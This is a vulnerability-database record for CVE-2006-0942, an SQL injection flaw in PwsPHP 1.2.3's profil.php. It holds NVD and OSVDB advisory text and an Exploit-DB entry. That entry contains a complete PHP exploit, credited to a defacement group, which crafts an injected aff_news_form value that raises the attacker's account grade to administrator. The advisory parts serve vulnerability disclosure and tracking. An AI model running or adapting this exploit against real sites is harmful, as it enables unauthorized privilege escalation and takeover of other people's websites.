ID CVE-2006-0942 Type cve Reporter NVD Modified 2008-09-05T17:00:37
Description
SQL injection vulnerability in profil.php in PwsPHP 1.2.3, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the aff_news_form parameter, a different vulnerability than CVE-2005-1509.
{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0942", "history": [], "references": ["http://downloads.securityfocus.com/vulnerabilities/exploits/PwsPHP_SQL_Inj.php", "http://www.securityfocus.com/bid/16567"], "lastseen": "2016-09-03T06:33:27", "bulletinFamily": "NVD", "title": "CVE-2006-0942", "cpe": ["cpe:/a:pwsphp:pwsphp:1.2.3"], "viewCount": 0, "id": "CVE-2006-0942", "hash": "8197b77e7610d969a12eebec402d8856e40b98630acc70bd5ac84a7f4fb921c8", "description": "SQL injection vulnerability in profil.php in PwsPHP 1.2.3, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the aff_news_form parameter, a different vulnerability than CVE-2005-1509.", "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "cvelist": ["CVE-2006-0942"], "scanner": [], "modified": "2008-09-05T17:00:37", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "objectVersion": "1.2", "reporter": "NVD", "type": "cve", "published": "2006-02-28T21:02:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-09-03T06:33:27"}, "vulnersScore": 7.5}}
{"osvdb": [{"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Vulnerability Description\nPwsPHP contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'profil.php' script not properly sanitizing user-supplied input to the 'aff_news_form' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nPwsPHP contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'profil.php' script not properly sanitizing user-supplied input to the 'aff_news_form' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.pwsphp.com/\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/PwsPHP_SQL_Inj.php\n[CVE-2006-0942](https://vulners.com/cve/CVE-2006-0942)\nBugtraq ID: 16567\n", "reporter": "papipsycho()", "published": "2006-09-01T17:56:52", "type": "osvdb", "title": "PwsPHP profil.php aff_news_form Variable Arbitrary SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PwsPHP", "version": "1.2.3", "operator": "eq"}], "cvelist": ["CVE-2006-0942"], "modified": "2006-09-01T17:56:52", "href": "https://vulners.com/osvdb/OSVDB:28444", "id": "OSVDB:28444", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T05:16:56", "osvdbidlist": ["28444"], "references": [], "edition": 1, "description": "PwsPHP 1.2.3 Index.PHP SQL Injection Vulnerability. CVE-2006-0942. Webapps exploit for php platform", "reporter": "papipsycho", "published": "2006-02-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "PwsPHP 1.2.3 Index.PHP SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0942"], "modified": "2006-02-09T00:00:00", "id": "EDB-ID:27175", "href": "https://www.exploit-db.com/exploits/27175/", "sourceData": "source: http://www.securityfocus.com/bid/16567/info\r\n\r\nPwsPHP is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nSuccessful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.\r\n\r\nThis issue is reported to affect version 1.2.3; other versions may also be vulnerable. \r\n\r\n<?php\r\n\r\n/*\r\n\r\nPwsPHP 1.2.3 & <? Remote Root\r\nmagic quote: Off\r\nCredited: papipsycho\r\nwrite code: papipsycho\r\nfor: G0t R00t ? Amd [W]orld [D]efacers\r\nWebsite: http://www.papipsycho.com & http://www.worlddefacers.net\r\nDate: 09/02/2006\r\n\r\nto connect and logged with the cookie then to launch the exploit\r\nEnjoy.\r\n\r\n*/\r\n\r\necho \"<title>PwsPHP 1.2.3 & <? Remote Root :: By Papipsycho</title>\"\r\n . \"to connect and logged with the cookie then to launch the exploit<br>Enjoy.<br><br>\";\r\n\r\nif(empty($_POST['url']) AND empty($_POST['pseudo']) AND empty($_POST['pass']) AND empty($_POST['nom']))\r\n{\r\n echo \"<form method=\\\"post\\\" action=\\\"pws-root_paps.php\\\">\"\r\n . \"Pseudo: <input type=\\\"text\\\" name=\\\"pseudo\\\"><br>\"\r\n . \"Pass: <input type=\\\"text\\\" name=\\\"pass\\\"><br>\"\r\n . \"Id: <input type=\\\"text\\\" name=\\\"id\\\"><br>\"\r\n . \"Name: <input type=\\\"text\\\" name=\\\"nom\\\"><br>\"\r\n . \"Mail: <input type=\\\"text\\\" name=\\\"mail\\\"><br>\"\r\n . \"Url: <input type=\\\"text\\\" name=\\\"url\\\" value=\\\"http://example.com/pwsphp\\\"><br>\"\r\n . \"<input type=\\\"submit\\\" value=\\\"Send\\\">\"\r\n . \"</form>\";\r\n}\r\nelse\r\n{\r\n $url = $_POST['url'];\r\n $pseudo = $_POST['pseudo'];\r\n $pass = $_POST['pass'];\r\n $pass_md5 = md5($pass);\r\n $nom = $_POST['nom'];\r\n $mail = $_POST['mail'];\r\n $id = $_POST['id'];\r\n\r\n echo \"<form method=\\\"post\\\" name=\\\"new_user\\\" action=\\\"$url/profil.php\\\" id=\\\"formulaire\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"pseudo\\\" value=\\\"$pseudo\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"nom\\\" value=\\\"$nom\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"pass2\\\" value=\\\"$pass\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"oldpass\\\" value=\\\"$pass_md5\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"email\\\" value=\\\"$mail\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"aff_email\\\" value=\\\"1\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"mp_popup\\\" value=\\\"1\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"popup\\\" value=\\\"1\\\">\"\r\n . '<input type=\"hidden\" name=\"aff_news_form\" value=\\'10\",grade=\"4\" WHERE `users`.`pseudo`=\"' . $pseudo . '\" AND `users`.`id`=\"' .$id . '\"/*\\'>'\r\n . \"<input type=\\\"hidden\\\" name=\\\"icq\\\" value=\\\"\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"aim\\\" value=\\\"\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"msn\\\" value=\\\"\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"yahoom\\\" value=\\\"\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"site\\\" value=\\\"\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"localisation\\\" value=\\\"\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"urlavatar\\\" value=\\\"images/avatars/1.gif\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"signatue\\\" value=\\\"\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"ok\\\" value=\\\"1\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"id\\\" value=\\\"$id\\\">\"\r\n . \"<input type=\\\"hidden\\\" name=\\\"ac\\\" value=\\\"modifier\\\">\"\r\n . \"<center><input type=\\\"submit\\\" value=\\\"Clic Here\\\"></center>\"\r\n . \"</form>\";\r\n}\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27175/"}]}
